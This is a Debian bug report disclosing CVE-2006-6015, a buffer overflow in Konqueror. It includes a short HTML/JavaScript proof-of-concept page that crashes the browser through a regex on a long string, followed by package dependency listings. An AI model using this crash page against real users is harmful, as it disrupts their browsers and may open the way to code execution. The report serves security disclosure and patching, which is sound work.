
Bug#400121: CVE-2006-6015: Buffer overflow in konqueror



Package: konqueror
Version: 4:3.5.5a.dfsg.1-2
Severity: grave
Tags: security
Justification: user security hole


Konqueror crashes when opening the following page:

<html>
<head>
<script>
var reg = /(.)*/;
var z = 'Z';
while (z.length <= 8192) z+=z;
var boum = reg.exec(z);
</script>
</head>
</html>

The original poster claimed this could be used to execute arbitrary
code:
http://www.securityfocus.com/archive/1/archive/1/451542/100/0/threaded

Please mention the CVE ID in the changelog.

-- System Information:
Debian Release: 4.0
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Locale: LANG=de_DE@euro, LC_CTYPE=de_DE@euro (charmap=ISO-8859-15)

Versions of packages konqueror depends on:
ii  kcontrol               4:3.5.5a.dfsg.1-2 control center for KDE
ii  kdebase-kio-plugins    4:3.5.5a.dfsg.1-2 core I/O slaves for KDE
ii  kdelibs4c2a            4:3.5.5a.dfsg.1-5 core libraries and binaries for al
ii  kdesktop               4:3.5.5a.dfsg.1-2 miscellaneous binaries and files f
ii  kfind                  4:3.5.5a.dfsg.1-2 file-find utility for KDE
ii  libacl1                2.2.41-1          Access control list shared library
ii  libart-2.0-2           2.3.17-1          Library of functions for 2D graphi
ii  libattr1               2.4.32-1          Extended attribute shared library
ii  libaudio2              1.8-2             The Network Audio System (NAS). (s
ii  libc6                  2.3.6.ds1-8       GNU C Library: Shared libraries
ii  libfam0                2.7.0-11          Client library to control the FAM 
ii  libfontconfig1         2.4.1-2           generic font configuration library
ii  libfreetype6           2.2.1-5           FreeType 2 font engine, shared lib
ii  libgcc1                1:4.1.1-20        GCC support library
ii  libice6                1:1.0.1-2         X11 Inter-Client Exchange library
ii  libidn11               0.6.5-1           GNU libidn library, implementation
ii  libjpeg62              6b-13             The Independent JPEG Group's JPEG 
ii  libkonq4               4:3.5.5a.dfsg.1-2 core libraries for Konqueror
ii  libpng12-0             1.2.13-4          PNG library - runtime
ii  libqt3-mt              3:3.3.7-1         Qt GUI Library (Threaded runtime v
ii  libsm6                 1:1.0.1-3         X11 Session Management library
ii  libstdc++6             4.1.1-20          The GNU Standard C++ Library v3
ii  libx11-6               2:1.0.3-4         X11 client-side library
ii  libxcursor1            1.1.7-4           X cursor management library
ii  libxext6               1:1.0.1-2         X11 miscellaneous extension librar
ii  libxft2                2.1.8.2-8         FreeType-based font drawing librar
ii  libxi6                 1:1.0.1-3         X11 Input extension library
ii  libxinerama1           1:1.0.1-4.1       X11 Xinerama extension library
ii  libxrandr2             2:1.1.0.2-4       X11 RandR extension library
ii  libxrender1            1:0.9.1-3         X Rendering Extension client libra
ii  libxt6                 1:1.0.2-2         X11 toolkit intrinsics library
ii  zlib1g                 1:1.2.3-13        compression library - runtime

konqueror recommends no packages.

-- no debconf information


